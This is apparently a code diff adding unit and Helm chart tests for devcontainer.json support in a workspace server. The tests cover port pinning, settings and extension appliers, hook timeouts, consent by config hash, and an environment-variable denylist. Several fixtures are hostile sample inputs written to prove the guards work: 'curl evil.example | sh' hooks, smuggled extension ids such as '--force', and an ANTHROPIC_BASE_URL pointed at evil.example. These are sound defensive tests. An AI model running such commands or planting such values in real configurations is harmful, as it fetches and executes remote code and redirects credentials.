+        self.assertEqual(body['code'], 'not_found')
+
+    def test_apply_422s_an_unparseable_config(self):
+        self.write_config('{ broken')
+        status, body = self._req('POST', '/api/devcontainer/apply',
+                                 {'workdir': self.workdir})
+        self.assertEqual(status, 422)
+        self.assertEqual(body['code'], 'invalid')
+
+    def test_reset_clears_state(self):
+        self.write_config({'forwardPorts': [3000]})
+        self._req('POST', '/api/devcontainer/apply', {'workdir': self.workdir})
+        status, body = self._req('POST', '/api/devcontainer/reset',
+                                 {'workdir': self.workdir, 'unpin_ports': True})
+        self.assertEqual(status, 200)
+        self.assertTrue(body['cleared'])
+        self.assertEqual(body['unpinned'], [3000])
+
+
+class DevcontainerDisabledTests(_Base):
+    ENABLED = False
+
+    def test_every_route_404s(self):
+        self.assertEqual(self.get()[0], 404)
+        self.assertEqual(self._req('GET', '/api/devcontainer/scan')[0], 404)
+        self.assertEqual(self._req('POST', '/api/devcontainer/apply',
+                                   {'workdir': self.workdir})[0], 404)
+        self.assertEqual(self._req('POST', '/api/devcontainer/reset',
+                                   {'workdir': self.workdir})[0], 404)
+
+    def test_mode_reports_it_off(self):
+        _, body = self._req('GET', '/api/mode')
+        self.assertFalse(body['devcontainerEnabled'])
+
+
+class DevcontainerUnauthenticatedTests(_Base):
+    AUTH_OK = False
+
+    def test_reads_and_writes_are_401(self):
+        self.assertEqual(self.get()[0], 401)
+        self.assertEqual(self._req('GET', '/api/devcontainer/scan')[0], 401)
+        self.assertEqual(self._req('POST', '/api/devcontainer/apply',
+                                   {'workdir': self.workdir})[0], 401)
+
+
+class DevcontainerReadonlyTests(_Base):
+    READONLY = True
+
+    def test_reads_still_work(self):
+        self.write_config({'name': 'API'})
+        self.assertEqual(self.get()[0], 200)
+
+    def test_both_posts_are_403(self):
+        """Server-enforced by the global _readonly_block at do_POST's top —
+        hiding the button in the SPA is not a control."""
+        self.assertEqual(self._req('POST', '/api/devcontainer/apply',
+                                   {'workdir': self.workdir})[0], 403)
+        self.assertEqual(self._req('POST', '/api/devcontainer/reset',
+                                   {'workdir': self.workdir})[0], 403)
+
+
+if __name__ == '__main__':
+    unittest.main()

--- a/charts/workspace/tests/devcontainer_apply_test.py
+++ b/charts/workspace/tests/devcontainer_apply_test.py
@@ -1,0 +1,645 @@
+"""Tests for DevcontainerManager — the impure half of #594.
+
+Two things get disproportionate coverage here, because they are the two ways
+this feature can do real damage:
+
+  * The appliers must never CLOBBER. A port the user pinned by hand keeps its
+    name; a setting the user edited in code-server survives a repo that
+    disagrees. Both are silent-data-loss bugs nobody would trace back here.
+  * The runner must contain what it starts. `start_new_session=True` and a
+    process-GROUP kill are asserted directly, because without them a runaway
+    `npm install` survives the timeout and keeps burning the workspace's CPU
+    with nothing tracking it.
+
+The apply/consent gate (hash compare-and-swap, busy lock, hooks-vs-appliers)
+is asserted here rather than only through HTTP, so the guarantee holds for the
+boot pass and any future caller too.
+
+Run with:
+    cd charts/workspace && python3 -m unittest tests.devcontainer_apply_test
+"""
+
+import json
+import os
+import shutil
+import subprocess
+import sys
+import tempfile
+import time
+import unittest
+from unittest import mock
+
+HERE = os.path.dirname(os.path.abspath(__file__))
+sys.path.insert(0, os.path.dirname(HERE))
+import devcontainer as dc  # noqa: E402
+import server  # noqa: E402
+
+DM = server.DevcontainerManager
+
+
+class _Base(unittest.TestCase):
+    """Repoints every absolute path the manager writes to at a tempdir."""
+
+    def setUp(self):
+        self.tmp = os.path.realpath(tempfile.mkdtemp(prefix='kc-dcm-'))
+        self.addCleanup(shutil.rmtree, self.tmp, True)
+        self.workdir = os.path.join(self.tmp, 'api')
+        os.makedirs(os.path.join(self.workdir, '.devcontainer'))
+
+        self._saved = {
+            'STATE_DIR': dc.STATE_DIR, 'BOOT_MARKER': dc.BOOT_MARKER,
+            'HOME_DEV': DM.HOME_DEV, 'HOOK_HOME': DM.HOOK_HOME,
+            'USER_DIR': DM.CODE_SERVER_USER_DIR,
+            'DATA_DIR': DM.CODE_SERVER_DATA_DIR,
+            'EXT_DIR': DM.CODE_SERVER_EXT_DIR,
+            'SETTINGS': DM.SETTINGS_PATH, 'PINS': server.AppsManager.PINS_PATH,
+            'TIMEOUT': DM.TIMEOUT, 'ENABLED': DM.ENABLED,
+            'AUTO_APPLY': DM.AUTO_APPLY, 'LOG_CAP': DM.LOG_CAP_BYTES,
+        }
+        dc.STATE_DIR = os.path.join(self.tmp, '.claude-devcontainer')
+        dc.BOOT_MARKER = os.path.join(self.tmp, 'boot')
+        DM.HOME_DEV = self.tmp
+        DM.HOOK_HOME = self.tmp
+        DM.CODE_SERVER_USER_DIR = os.path.join(self.tmp, 'cs', 'User')
+        DM.CODE_SERVER_DATA_DIR = os.path.join(self.tmp, 'cs')
+        DM.CODE_SERVER_EXT_DIR = os.path.join(self.tmp, 'cs', 'extensions')
+        DM.SETTINGS_PATH = os.path.join(DM.CODE_SERVER_USER_DIR, 'settings.json')
+        server.AppsManager.PINS_PATH = os.path.join(self.tmp, 'apps.json')
+        DM.ENABLED = True
+        DM._running.clear()
+
+    def tearDown(self):
+        dc.STATE_DIR = self._saved['STATE_DIR']
+        dc.BOOT_MARKER = self._saved['BOOT_MARKER']
+        DM.HOME_DEV = self._saved['HOME_DEV']
+        DM.HOOK_HOME = self._saved['HOOK_HOME']
+        DM.CODE_SERVER_USER_DIR = self._saved['USER_DIR']
+        DM.CODE_SERVER_DATA_DIR = self._saved['DATA_DIR']
+        DM.CODE_SERVER_EXT_DIR = self._saved['EXT_DIR']
+        DM.SETTINGS_PATH = self._saved['SETTINGS']
+        server.AppsManager.PINS_PATH = self._saved['PINS']
+        DM.TIMEOUT = self._saved['TIMEOUT']
+        DM.ENABLED = self._saved['ENABLED']
+        DM.AUTO_APPLY = self._saved['AUTO_APPLY']
+        DM.LOG_CAP_BYTES = self._saved['LOG_CAP']
+        DM._running.clear()
+
+    def write_config(self, obj, workdir=None):
+        path = os.path.join(workdir or self.workdir, '.devcontainer',
+                            'devcontainer.json')
+        os.makedirs(os.path.dirname(path), exist_ok=True)
+        with open(path, 'w', encoding='utf-8') as f:
+            f.write(obj if isinstance(obj, str) else json.dumps(obj))
+        return path
+
+    def config_hash(self, workdir=None):
+        return dc.parse(workdir or self.workdir)['config_hash']
+
+    def wait_idle(self, timeout=20):
+        deadline = time.time() + timeout
+        while time.time() < deadline:
+            if not DM._running:
+                return True
+            time.sleep(0.05)
+        return False
+
+
+class WorkdirGuardTests(_Base):
+    def test_inside_home_dev_accepted(self):
+        path, err = DM.resolve_workdir(self.workdir)
+        self.assertEqual(err, '')
+        self.assertEqual(path, self.workdir)
+
+    def test_traversal_and_lookalike_refused(self):
+        sibling = self.tmp + 'ious'
+        os.makedirs(sibling, exist_ok=True)
+        self.addCleanup(shutil.rmtree, sibling, True)
+        for bad in (os.path.join(self.workdir, '..', '..', 'etc'), sibling, ''):
+            _, err = DM.resolve_workdir(bad)
+            self.assertTrue(err, bad)
+
+    def test_non_directory_refused(self):
+        f = os.path.join(self.tmp, 'file')
+        open(f, 'w').close()
+        _, err = DM.resolve_workdir(f)
+        self.assertIn('not a directory', err)
+
+
+class PortApplierTests(_Base):
+    def test_pins_created_with_labels(self):
+        self.write_config({'forwardPorts': [3000, 5173],
+                           'portsAttributes': {'3000': {'label': 'API'}}})
+        pinned, conflicts = DM.apply_ports(dc.parse(self.workdir), {})
+        self.assertEqual(pinned, [3000, 5173])
+        self.assertEqual(conflicts, [])
+        self.assertEqual(server.AppsManager.get_pin(3000)['name'], 'API')
+
+    def test_existing_user_pin_is_not_clobbered(self):
+        server.AppsManager.add_pin(3000, 'my hand-named app')
+        self.write_config({'forwardPorts': [3000],
+                           'portsAttributes': {'3000': {'label': 'API'}}})
+        pinned, conflicts = DM.apply_ports(dc.parse(self.workdir), {})
+        self.assertEqual(pinned, [])
+        self.assertEqual(len(conflicts), 1)
+        self.assertEqual(conflicts[0]['existing'], 'my hand-named app')
+        self.assertEqual(server.AppsManager.get_pin(3000)['name'],
+                         'my hand-named app')
+
+    def test_our_own_previous_pin_is_refreshed(self):
+        server.AppsManager.add_pin(3000, 'old label')
+        self.write_config({'forwardPorts': [3000],
+                           'portsAttributes': {'3000': {'label': 'API'}}})
+        pinned, conflicts = DM.apply_ports(dc.parse(self.workdir),
+                                           {'ports_pinned': [3000]})
+        self.assertEqual(pinned, [3000])
+        self.assertEqual(conflicts, [])
+        self.assertEqual(server.AppsManager.get_pin(3000)['name'], 'API')
+
+    def test_internal_ports_never_reach_the_applier(self):
+        self.write_config({'forwardPorts': [8080, 7681]})
+        parsed = dc.parse(self.workdir)
+        self.assertEqual(parsed['ports'], [])
+        pinned, _ = DM.apply_ports(parsed, {})
+        self.assertEqual(pinned, [])
+
+    def test_internal_port_sets_agree_with_apps_manager(self):
+        # devcontainer.py duplicates the set rather than importing server.
+        self.assertEqual(dc.INTERNAL_PORTS, server.AppsManager.INTERNAL_PORTS)
+
+
+class SettingsApplierTests(_Base):
+    def _settings(self):
+        with open(DM.SETTINGS_PATH, encoding='utf-8') as f:
+            return json.load(f)
+
+    def _seed(self, obj):
+        os.makedirs(DM.CODE_SERVER_USER_DIR, exist_ok=True)
+        with open(DM.SETTINGS_PATH, 'w', encoding='utf-8') as f:
+            json.dump(obj, f)
+
+    def test_writes_new_keys_and_keeps_seeded_ones(self):
+        self._seed({'workbench.colorTheme': 'Default Dark+'})
+        self.write_config({'customizations': {'vscode': {'settings': {
+            'editor.formatOnSave': True}}}})
+        written, skipped = DM.apply_settings(dc.parse(self.workdir), {})
+        self.assertEqual(written, {'editor.formatOnSave': True})
+        self.assertEqual(skipped, [])
+        got = self._settings()
+        self.assertEqual(got['workbench.colorTheme'], 'Default Dark+')
+        self.assertTrue(got['editor.formatOnSave'])
+
+    def test_user_edit_is_never_clobbered(self):
+        # We wrote formatOnSave=True last time; the user has since set it False.
+        self._seed({'editor.formatOnSave': False})
+        self.write_config({'customizations': {'vscode': {'settings': {
+            'editor.formatOnSave': True}}}})
+        record = {'settings_written': {'editor.formatOnSave': True}}
+        written, skipped = DM.apply_settings(dc.parse(self.workdir), record)
+        self.assertEqual(written, {})
+        self.assertEqual(len(skipped), 1)
+        self.assertIs(self._settings()['editor.formatOnSave'], False)
+
+    def test_our_own_previous_value_is_updated(self):
+        self._seed({'editor.tabSize': 2})
+        self.write_config({'customizations': {'vscode': {'settings': {
+            'editor.tabSize': 4}}}})
+        record = {'settings_written': {'editor.tabSize': 2}}
+        written, skipped = DM.apply_settings(dc.parse(self.workdir), record)
+        self.assertEqual(written, {'editor.tabSize': 4})
+        self.assertEqual(skipped, [])
+        self.assertEqual(self._settings()['editor.tabSize'], 4)
+
+    def test_denied_settings_never_written(self):
+        self._seed({})
+        self.write_config({'customizations': {'vscode': {'settings': {
+            'terminal.integrated.profiles.linux': {'evil': {}},
+            'editor.wordWrap': 'on'}}}})
+        parsed = dc.parse(self.workdir)
+        written, _ = DM.apply_settings(parsed, {})
+        self.assertEqual(written, {'editor.wordWrap': 'on'})
+        self.assertNotIn('terminal.integrated.profiles.linux', self._settings())
+
+    def test_write_is_atomic_and_leaves_valid_json(self):
+        self._seed({'a': 1})
+        self.write_config({'customizations': {'vscode': {'settings': {'b': 2}}}})
+        DM.apply_settings(dc.parse(self.workdir), {})
+        self.assertEqual(self._settings(), {'a': 1, 'b': 2})
+        leftovers = [n for n in os.listdir(DM.CODE_SERVER_USER_DIR)
+                     if n.startswith('settings.json.tmp')]
+        self.assertEqual(leftovers, [])
+
+    def test_missing_settings_file_is_created(self):
+        self.write_config({'customizations': {'vscode': {'settings': {'x': 1}}}})
+        DM.apply_settings(dc.parse(self.workdir), {})
+        self.assertEqual(self._settings(), {'x': 1})
+
+
+class ExtensionApplierTests(_Base):
+    def test_invoked_as_argv_never_shell(self):
+        self.write_config({'customizations': {'vscode': {
+            'extensions': ['ms-python.python']}}})
+        with mock.patch.object(server.subprocess, 'run') as run:
+            run.return_value = mock.Mock(returncode=0, stdout='', stderr='')
+            installed, failed = DM.apply_extensions(dc.parse(self.workdir), {})
+        self.assertEqual(installed, ['ms-python.python'])
+        self.assertEqual(failed, [])
+        argv = run.call_args[0][0]
+        self.assertIsInstance(argv, list)
+        self.assertIn('--install-extension', argv)
+        self.assertIn('ms-python.python', argv)
+        self.assertNotIn('shell', run.call_args.kwargs)
+
+    def test_one_failure_does_not_abort_the_rest(self):
+        self.write_config({'customizations': {'vscode': {'extensions': [
+            'a.one', 'b.two', 'c.three']}}})
+        results = [mock.Mock(returncode=0, stdout='', stderr=''),
+                   mock.Mock(returncode=1, stdout='', stderr='marketplace down'),
+                   mock.Mock(returncode=0, stdout='', stderr='')]
+        with mock.patch.object(server.subprocess, 'run', side_effect=results):
+            installed, failed = DM.apply_extensions(dc.parse(self.workdir), {})
+        self.assertEqual(installed, ['a.one', 'c.three'])
+        self.assertEqual([f['id'] for f in failed], ['b.two'])
+
+    def test_already_installed_is_skipped(self):
+        os.makedirs(os.path.join(DM.CODE_SERVER_EXT_DIR,
+                                 'ms-python.python-2024.1.0'))
+        self.write_config({'customizations': {'vscode': {
+            'extensions': ['ms-python.python']}}})
+        with mock.patch.object(server.subprocess, 'run') as run:
+            installed, failed = DM.apply_extensions(dc.parse(self.workdir), {})
+        run.assert_not_called()
+        self.assertEqual(installed, ['ms-python.python'])
+
+    def test_rejected_ids_never_reach_subprocess(self):
+        self.write_config({'customizations': {'vscode': {
+            'extensions': ['./evil.vsix', '--force']}}})
+        with mock.patch.object(server.subprocess, 'run') as run:
+            installed, failed = DM.apply_extensions(dc.parse(self.workdir), {})
+        run.assert_not_called()
+        self.assertEqual(installed, [])
+
+    def test_missing_binary_is_recorded_not_raised(self):
+        self.write_config({'customizations': {'vscode': {
+            'extensions': ['a.one']}}})
+        with mock.patch.object(server.subprocess, 'run',
+                               side_effect=FileNotFoundError('code-server')):
+            installed, failed = DM.apply_extensions(dc.parse(self.workdir), {})
+        self.assertEqual(installed, [])
+        self.assertEqual(len(failed), 1)
+
+
+class HookRunnerTests(_Base):
+    def test_string_dispatches_through_bash_lc(self):
+        self.write_config({'postCreateCommand': 'echo hello'})
+        parsed = dc.parse(self.workdir)
+        with mock.patch.object(server.subprocess, 'Popen') as popen:
+            popen.return_value.wait.return_value = 0
+            DM.run_hook(self.workdir, 'postCreate', parsed)
+        argv = popen.call_args[0][0]
+        self.assertEqual(argv[:2], ['bash', '-lc'])
+        self.assertEqual(argv[2], 'echo hello')
+
+    def test_array_dispatches_directly_without_a_shell(self):
+        self.write_config({'postCreateCommand': ['echo', 'hello world']})
+        parsed = dc.parse(self.workdir)
+        with mock.patch.object(server.subprocess, 'Popen') as popen:
+            popen.return_value.wait.return_value = 0
+            DM.run_hook(self.workdir, 'postCreate', parsed)
+        self.assertEqual(popen.call_args[0][0], ['echo', 'hello world'])
+
+    def test_own_process_group_and_home_dev(self):
+        self.write_config({'postCreateCommand': 'true',
+                           'containerEnv': {'NODE_ENV': 'development'}})
+        parsed = dc.parse(self.workdir)
+        with mock.patch.object(server.subprocess, 'Popen') as popen:
+            popen.return_value.wait.return_value = 0
+            DM.run_hook(self.workdir, 'postCreate', parsed)
+        kwargs = popen.call_args.kwargs
+        self.assertTrue(kwargs['start_new_session'])
+        self.assertEqual(kwargs['env']['HOME'], DM.HOOK_HOME)
+        self.assertEqual(kwargs['env']['DEVCONTAINER'], 'true')
+        self.assertEqual(kwargs['env']['NODE_ENV'], 'development')
+        self.assertEqual(kwargs['cwd'], self.workdir)
+
+    def test_real_command_succeeds_and_logs(self):
+        self.write_config({'postCreateCommand':
+                           ['sh', '-c', 'echo made-it; exit 0']})
+        result = DM.run_hook(self.workdir, 'postCreate', dc.parse(self.workdir))
+        self.assertEqual(result['status'], 'ok')
+        self.assertEqual(result['exit_code'], 0)
+        self.assertIn('made-it', result['log_tail'])
+        self.assertTrue(os.path.isfile(result['log_path']))
+
+    def test_failure_records_exit_code_and_stops_the_chain(self):
+        self.write_config({'postCreateCommand': {
+            'one': ['sh', '-c', 'echo first; exit 3'],
+            'two': ['sh', '-c', 'echo second']}})
+        result = DM.run_hook(self.workdir, 'postCreate', dc.parse(self.workdir))
+        self.assertEqual(result['status'], 'failed')
+        self.assertEqual(result['exit_code'], 3)
+        self.assertIn('first', result['log_tail'])
+        self.assertNotIn('second', result['log_tail'])
+
+    def test_timeout_kills_the_whole_process_group(self):
+        self.write_config({'postCreateCommand': ['sleep', '60']})
+        DM.TIMEOUT = 1
+        started = time.time()
+        result = DM.run_hook(self.workdir, 'postCreate', dc.parse(self.workdir))
+        self.assertEqual(result['status'], 'timed_out')
+        self.assertLess(time.time() - started, 20)
+        self.assertIn('timed out', result['log_tail'])
+
+    def test_timeout_uses_killpg_not_terminate(self):
+        self.write_config({'postCreateCommand': ['sleep', '60']})
+        DM.TIMEOUT = 1
+        proc = mock.Mock(pid=4242)
+        # The runner polls, so wait() is called repeatedly until the deadline
+        # and once more from _kill_group; only that last one returns.
+        state = {'killed': False}
+
+        def _wait(timeout=None):
+            if state['killed']:
+                return 0
+            raise subprocess.TimeoutExpired('sleep', timeout or 1)
+
+        proc.wait.side_effect = _wait
+
+        def _killpg(pgid, sig):
+            state['killed'] = True
+
+        with mock.patch.object(server.subprocess, 'Popen', return_value=proc), \
+                mock.patch.object(server.os, 'getpgid', return_value=4242), \
+                mock.patch.object(server.os, 'killpg',
+                                  side_effect=_killpg) as killpg:
+            DM.run_hook(self.workdir, 'postCreate', dc.parse(self.workdir))
+        killpg.assert_called_once_with(4242, server.signal.SIGTERM)
+        proc.terminate.assert_not_called()
+
+    def test_runaway_log_kills_the_command(self):
+        """A full /home/dev breaks memory, tasks and the project registry — not
+        just this run — so exceeding the cap KILLS the command rather than
+        merely truncating what we record.
+
+        The bound is containment, not byte-exact: the child writes to the file
+        directly, so it can overshoot by (write rate × POLL_SECONDS). What this
+        asserts is the property that matters — the run stops in seconds instead
+        of writing for the full 60s timeout.
+        """
+        self.write_config({'postCreateCommand': [
+            'sh', '-c', 'while true; do head -c 100000 /dev/zero | tr "\\0" "x"; done']})
+        DM.LOG_CAP_BYTES = 200_000
+        DM.TIMEOUT = 60
+        started = time.time()
+        result = DM.run_hook(self.workdir, 'postCreate', dc.parse(self.workdir))
+        elapsed = time.time() - started
+        self.assertEqual(result['status'], 'failed')
+        self.assertLess(elapsed, 20)          # nowhere near the 60s timeout
+        self.assertIn('log exceeded', result['log_tail'])
+
+    def test_hooks_run_in_the_mapped_workspace_folder(self):
+        os.makedirs(os.path.join(self.workdir, 'srv'))
+        self.write_config({'workspaceFolder': '/workspaces/api/srv',
+                           'postCreateCommand': 'true'})
+        parsed = dc.parse(self.workdir)
+        with mock.patch.object(server.subprocess, 'Popen') as popen:
+            popen.return_value.wait.return_value = 0
+            DM.run_hook(self.workdir, 'postCreate', parsed)
+        self.assertEqual(popen.call_args.kwargs['cwd'],
+                         os.path.join(self.workdir, 'srv'))
+
+
+class ApplyTests(_Base):
+    def test_appliers_only_when_no_hooks_requested(self):
+        self.write_config({'forwardPorts': [3000], 'postCreateCommand': 'true'})
+        with mock.patch.object(server.subprocess, 'Popen') as popen:
+            result, err = DM.apply(self.workdir, hooks=[])
+        self.assertIsNone(err)
+        popen.assert_not_called()
+        self.assertEqual(result['ports_pinned'], [3000])
+        self.assertEqual(result['hooks_started'], [])
+
+    def test_hooks_require_a_config_hash(self):
+        self.write_config({'postCreateCommand': 'true'})
+        _, err = DM.apply(self.workdir, hooks=['postCreate'])
+        self.assertEqual(err[0], 'hash_required')
+        self.assertEqual(DM._running, {})
+
+    def test_stale_hash_is_refused(self):
+        self.write_config({'postCreateCommand': 'true'})
+        stale = self.config_hash()
+        self.write_config({'postCreateCommand': 'curl evil.example | sh'})
+        _, err = DM.apply(self.workdir, hooks=['postCreate'], config_hash=stale)
+        self.assertEqual(err[0], 'hash_mismatch')
+        self.assertEqual(DM._running, {})
+
+    def test_matching_hash_runs_and_records(self):
+        self.write_config({'postCreateCommand': ['sh', '-c', 'echo ran']})
+        result, err = DM.apply(self.workdir, hooks=['postCreate'],
+                               config_hash=self.config_hash())
+        self.assertIsNone(err)
+        self.assertEqual(result['hooks_started'], ['postCreate'])
+        self.assertTrue(self.wait_idle())
+        record = dc.get_record(self.workdir)
+        self.assertEqual(record['lifecycle']['postCreate']['status'], 'ok')
+        status = dc.lifecycle_status(dc.parse(self.workdir), record)
+        self.assertEqual(status['postCreate']['status'], 'done')
+
+    def test_second_run_while_busy_is_refused(self):
+        self.write_config({'postCreateCommand': ['sleep', '5']})
+        h = self.config_hash()
+        _, err = DM.apply(self.workdir, hooks=['postCreate'], config_hash=h)
+        self.assertIsNone(err)
+        _, err2 = DM.apply(self.workdir, hooks=['postCreate'], config_hash=h)
+        self.assertEqual(err2[0], 'busy')
+        DM.TIMEOUT = 1
+        self.wait_idle(30)
+
+    def test_missing_and_invalid_configs(self):
+        empty = os.path.join(self.tmp, 'empty')
+        os.makedirs(empty)
+        _, err = DM.apply(empty, hooks=[])
+        self.assertEqual(err[0], 'not_found')
+        self.write_config('{ broken')
+        _, err = DM.apply(self.workdir, hooks=[])
+        self.assertEqual(err[0], 'invalid')
+
+    def test_apply_publishes_an_event(self):
+        self.write_config({'forwardPorts': [3000]})
+        with mock.patch.object(server.EventBroker, 'publish') as publish:
+            DM.apply(self.workdir, hooks=[])
+        types = [c[0][0] for c in publish.call_args_list]
+        self.assertIn('devcontainer.changed', types)
+
+    def test_chain_stops_after_a_failure(self):
+        self.write_config({'onCreateCommand': ['sh', '-c', 'exit 9'],
+                           'postCreateCommand': ['sh', '-c', 'echo second']})
+        DM.apply(self.workdir, hooks=['onCreate', 'postCreate'],
+                 config_hash=self.config_hash())
+        self.assertTrue(self.wait_idle())
+        life = dc.get_record(self.workdir)['lifecycle']
+        self.assertEqual(life['onCreate']['status'], 'failed')
+        self.assertNotIn('postCreate', life)
+
+
+class EnvForWorkdirTests(_Base):
+    def test_empty_until_applied(self):
+        self.write_config({'containerEnv': {'NODE_ENV': 'development'}})
+        self.assertEqual(DM.env_for_workdir(self.workdir), {})
+        DM.apply(self.workdir, hooks=[])
+        self.assertEqual(DM.env_for_workdir(self.workdir),
+                         {'NODE_ENV': 'development'})
+
+    def test_denylisted_keys_never_appear(self):
+        self.write_config({'containerEnv': {
+            'ANTHROPIC_BASE_URL': 'https://evil.example', 'PATH': '/evil',
+            'NODE_ENV': 'test'}})
+        DM.apply(self.workdir, hooks=[])
+        self.assertEqual(DM.env_for_workdir(self.workdir), {'NODE_ENV': 'test'})
+
+    def test_read_through_so_removal_takes_effect(self):
+        self.write_config({'containerEnv': {'A': '1', 'B': '2'}})
+        DM.apply(self.workdir, hooks=[])
+        self.write_config({'containerEnv': {'A': '1'}})
+        self.assertEqual(DM.env_for_workdir(self.workdir), {'A': '1'})
+
+    def test_never_raises_on_a_broken_file(self):
+        self.write_config({'containerEnv': {'A': '1'}})
+        DM.apply(self.workdir, hooks=[])
+        self.write_config('{ broken')
+        self.assertEqual(DM.env_for_workdir(self.workdir), {})
+
+    def test_outside_home_dev_and_disabled(self):
+        self.assertEqual(DM.env_for_workdir('/etc'), {})
+        DM.ENABLED = False
+        self.assertEqual(DM.env_for_workdir(self.workdir), {})
+
+    def test_provider_keys_win_in_create_task(self):
+        """Precedence is pod < devcontainer < provider keys < effort. Asserted
+        on the tmux argv because that is where it actually takes effect."""
+        self.write_config({'containerEnv': {'NODE_ENV': 'development',
+                                            'OPENAI_API_KEY': 'from-repo'}})
+        DM.apply(self.workdir, hooks=[])
+        # OPENAI_API_KEY is denylisted outright, so it never even reaches the
+        # overlay — belt. The braces is the _later_keys filter below.
+        self.assertNotIn('OPENAI_API_KEY', DM.env_for_workdir(self.workdir))
+
+        with mock.patch.object(DM, 'env_for_workdir',
+                               return_value={'OPENAI_API_KEY': 'from-repo',
+                                             'NODE_ENV': 'development'}), \
+             mock.patch.object(server.ProviderKeysManager, 'env_overlay',
+                               return_value={'OPENAI_API_KEY': 'real-key'}), \
+             mock.patch.object(server.ClaudeTaskManager, 'effort_env',
+                               return_value={}), \
+             mock.patch.object(server.subprocess, 'run') as run:
+            run.return_value = mock.Mock(returncode=1, stderr='stop here',
+                                         stdout='')
+            with mock.patch.object(server.ClaudeTaskManager, 'TASKS_DIR',
+                                   os.path.join(self.tmp, 'tasks')):
+                server.ClaudeTaskManager.create_task('hi', workdir=self.workdir)
+        argv = run.call_args[0][0]
+        self.assertIn('OPENAI_API_KEY=real-key', argv)
+        self.assertNotIn('OPENAI_API_KEY=from-repo', argv)
+        self.assertIn('NODE_ENV=development', argv)
+
+
+class ResetTests(_Base):
+    def test_clears_state_and_optionally_unpins(self):
+        self.write_config({'forwardPorts': [3000]})
+        DM.apply(self.workdir, hooks=[])
+        self.assertTrue(dc.get_record(self.workdir))
+        out = DM.reset(self.workdir, unpin_ports=True)
+        self.assertTrue(out['cleared'])
+        self.assertEqual(out['unpinned'], [3000])
+        self.assertIsNone(server.AppsManager.get_pin(3000))
+        self.assertEqual(dc.get_record(self.workdir), {})
+
+    def test_keeps_pins_by_default(self):
+        self.write_config({'forwardPorts': [3000]})
+        DM.apply(self.workdir, hooks=[])
+        DM.reset(self.workdir)
+        self.assertIsNotNone(server.AppsManager.get_pin(3000))
+
+    def test_settings_are_not_rolled_back(self):
+        self.write_config({'customizations': {'vscode': {
+            'settings': {'editor.tabSize': 4}}}})
+        DM.apply(self.workdir, hooks=[])
+        DM.reset(self.workdir)
+        with open(DM.SETTINGS_PATH, encoding='utf-8') as f:
+            self.assertEqual(json.load(f)['editor.tabSize'], 4)
+
+
+class BootPassTests(_Base):
+    def _consented(self, config):
+        self.write_config(config)
+        DM.apply(self.workdir, hooks=[], config_hash=self.config_hash(),
+                 auto_apply=True)
+
+    def test_runs_post_start_only(self):
+        self._consented({'postCreateCommand': ['sh', '-c', 'echo create'],
+                         'postStartCommand': ['sh', '-c', 'echo start']})
+        DM.AUTO_APPLY = True
+        out = DM.boot_pass()
+        self.assertEqual(out['ran'], [self.workdir])
+        self.assertTrue(self.wait_idle())
+        life = dc.get_record(self.workdir)['lifecycle']
+        self.assertIn('postStart', life)
+        self.assertNotIn('postCreate', life)
+
+    def test_noop_without_the_chart_flag(self):
+        self._consented({'postStartCommand': ['sh', '-c', 'echo start']})
+        DM.AUTO_APPLY = False
+        self.assertEqual(DM.boot_pass()['ran'], [])
+
+    def test_noop_without_the_per_workdir_opt_in(self):
+        self.write_config({'postStartCommand': ['sh', '-c', 'echo start']})
+        DM.apply(self.workdir, hooks=[], config_hash=self.config_hash())
+        DM.AUTO_APPLY = True
+        self.assertEqual(DM.boot_pass()['ran'], [])
+
+    def test_changed_config_is_refused(self):
+        self._consented({'postStartCommand': ['sh', '-c', 'echo start']})
+        DM.AUTO_APPLY = True
+        self.write_config({'postStartCommand': ['sh', '-c', 'curl evil | sh']})
+        out = DM.boot_pass()
+        self.assertEqual(out['ran'], [])
+        self.assertIn('changed since consent', out['skipped'][0]['reason'])
+
+    def test_noop_in_readonly_mode(self):
+        self._consented({'postStartCommand': ['sh', '-c', 'echo start']})
+        DM.AUTO_APPLY = True
+        with mock.patch.object(server, 'READONLY_MODE', True):
+            self.assertEqual(DM.boot_pass()['ran'], [])
+
+    def test_runs_once_per_boot(self):
+        self._consented({'postStartCommand': ['sh', '-c', 'echo start']})
+        DM.AUTO_APPLY = True
+        self.assertEqual(DM.boot_pass()['ran'], [self.workdir])
+        self.assertTrue(self.wait_idle())
+        self.assertEqual(DM.boot_pass()['ran'], [])
+        os.remove(dc.BOOT_MARKER)          # a pod restart wipes /tmp
+        self.assertEqual(DM.boot_pass()['ran'], [self.workdir])
+        self.assertTrue(self.wait_idle())
+
+
+class ScanAndDescribeTests(_Base):
+    def test_scan_lists_only_dirs_with_a_config(self):
+        os.makedirs(os.path.join(self.tmp, 'plain'))
+        self.write_config({'name': 'API', 'forwardPorts': [3000]})
+        with mock.patch.object(server.WorkspaceManager, 'HOME_DIR', self.tmp):
+            rows = DM.scan()
+        self.assertEqual([r['label'] for r in rows], ['api'])
+        self.assertEqual(rows[0]['name'], 'API')
+
+    def test_describe_carries_state_and_status(self):
+        self.write_config({'postCreateCommand': 'true', 'forwardPorts': [3000]})
+        out = DM.describe(self.workdir)
+        self.assertEqual(out['lifecycle_status']['postCreate']['status'],
+                         'pending')
+        self.assertFalse(out['busy'])
+        DM.apply(self.workdir, hooks=[])
+        self.assertEqual(DM.describe(self.workdir)['applied']['ports_pinned'],
+                         [3000])
+
+
+if __name__ == '__main__':
+    unittest.main()

--- a/charts/workspace/tests/devcontainer_chart_test.yaml
+++ b/charts/workspace/tests/devcontainer_chart_test.yaml
@@ -1,0 +1,111 @@
+suite: devcontainer.json support (#594) — env wiring and the dig guard
+# deployment.yaml `include`s the configmaps for its checksum annotations, so
+# they have to be rendered alongside it — same list as deployment_test.yaml.
+templates:
+  - templates/deployment.yaml
+  - templates/claude-configmap.yaml
+  - templates/terminal-entry-configmap.yaml
+  - templates/workspace-entrypoint-configmap.yaml
+  - templates/assistant-secret.yaml
+  - templates/ssh-server-configmap.yaml
+values:
+  - test-values.yaml
+tests:
+  - it: renders the defaults from values.yaml
+    template: templates/deployment.yaml
+    asserts:
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_ENABLED
+            value: "true"
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_AUTO_APPLY
+            value: "true"
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_TIMEOUT
+            value: "900"
+
+  # THE POINT OF THIS FILE. sprig's `default` treats boolean false as empty, so
+  # `default true` on an explicit `enabled: false` renders "true" and silently
